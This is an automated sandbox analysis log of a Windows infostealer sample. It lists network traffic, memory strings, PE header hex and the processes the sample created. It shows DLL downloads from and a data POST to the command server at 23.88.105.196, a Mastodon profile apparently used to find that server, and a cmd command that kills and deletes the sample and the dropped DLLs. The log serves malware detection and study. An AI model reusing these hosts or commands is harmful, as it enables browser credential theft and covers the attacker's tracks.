a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:10 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:10 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:10 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:10 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.105.196

Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp

String found in binary or memory: eo Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track versio equals www.facebook.com (Facebook)

Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: http://23.88.105.196/
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: http://23.88.105.196/1008
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: http://23.88.105.196/freebl3.dll
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: http://23.88.105.196/mozglue.dll
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: http://23.88.105.196/mozglue.dll$
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: http://23.88.105.196/msvcp140.dll
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: http://23.88.105.196/nss3.dll
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: http://23.88.105.196/nss3.dllO
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: http://23.88.105.196/softokn3.dll
Source: nss3[1].dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3[1].dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nss3[1].dll.1.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nss3[1].dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: nss3[1].dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3[1].dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3[1].dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/plp
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: nss3[1].dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: nss3[1].dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: nss3[1].dll.1.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.cop
Source: nss3[1].dll.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: nss3[1].dll.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: nss3[1].dll.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: mozglue[1].dll.1.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: nss3[1].dll.1.dr	String found in binary or memory: http://www.mozilla.com0
Source: temp.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: temp.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: temp.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: temp.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: temp.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtabSQLite
Source: temp.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/tootsuite/mastodon
Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp	String found in binary or memory: https://joinmastodon.org/apps
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: https://mas.to
Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp	String found in binary or memory: https://mas.to/
Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp	String found in binary or memory: https://mas.to/avatars/original/missing.png
Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp	String found in binary or memory: https://mas.to/users/killern0
Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp	String found in binary or memory: https://mas.to/users/killern0/followers
Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp	String found in binary or memory: https://mas.to/users/killern0/following
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: https://media.mas.to
Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp	String found in binary or memory: https://media.mas.to/masto-public/site_uploads/files/000/000/003/original/elephant_ui_plane-e3f2d57c
Source: temp.1.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: temp.1.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: nss3[1].dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: temp.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST /1008 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--

Source: unknown

DNS traffic detected: queries for: mas.to

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Code function: 1_2_00410340 DeleteUrlCacheEntry,DeleteUrlCacheEntry,DeleteUrlCacheEntry,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_00410340

Source: global traffic	HTTP traffic detected: GET /@killern0 HTTP/1.1Host: mas.to
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 23.88.105.196Connection: Keep-Alive

Source: unknown

HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.6:49740 version: TLS 1.2

Source: T6zZFfRLqs.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_00413270	1_2_00413270
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_0041E780	1_2_0041E780
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_00498990	1_2_00498990
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_0041DBF0	1_2_0041DBF0
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_00439000	1_2_00439000
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_004AD033	1_2_004AD033
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_004690E0	1_2_004690E0
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_0049D0F0	1_2_0049D0F0
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_00421200	1_2_00421200
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_004982C0	1_2_004982C0
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_004B22EF	1_2_004B22EF
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_00450340	1_2_00450340
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_00421360	1_2_00421360
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_00464400	1_2_00464400

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: String function: 00401020 appears 53 times
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: String function: 0049CF02 appears 36 times

Source: T6zZFfRLqs.exe, 00000001.00000003.373993056.00000000030AA000.00000004.00000001.sdmp

Binary or memory string: OriginalFilenamemsvcp140.dll^ vs T6zZFfRLqs.exe

Source: T6zZFfRLqs.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: T6zZFfRLqs.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: T6zZFfRLqs.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: T6zZFfRLqs.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: T6zZFfRLqs.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: T6zZFfRLqs.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\T6zZFfRLqs.exe 'C:\Users\user\Desktop\T6zZFfRLqs.exe'
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im T6zZFfRLqs.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im T6zZFfRLqs.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6	Jump to behavior

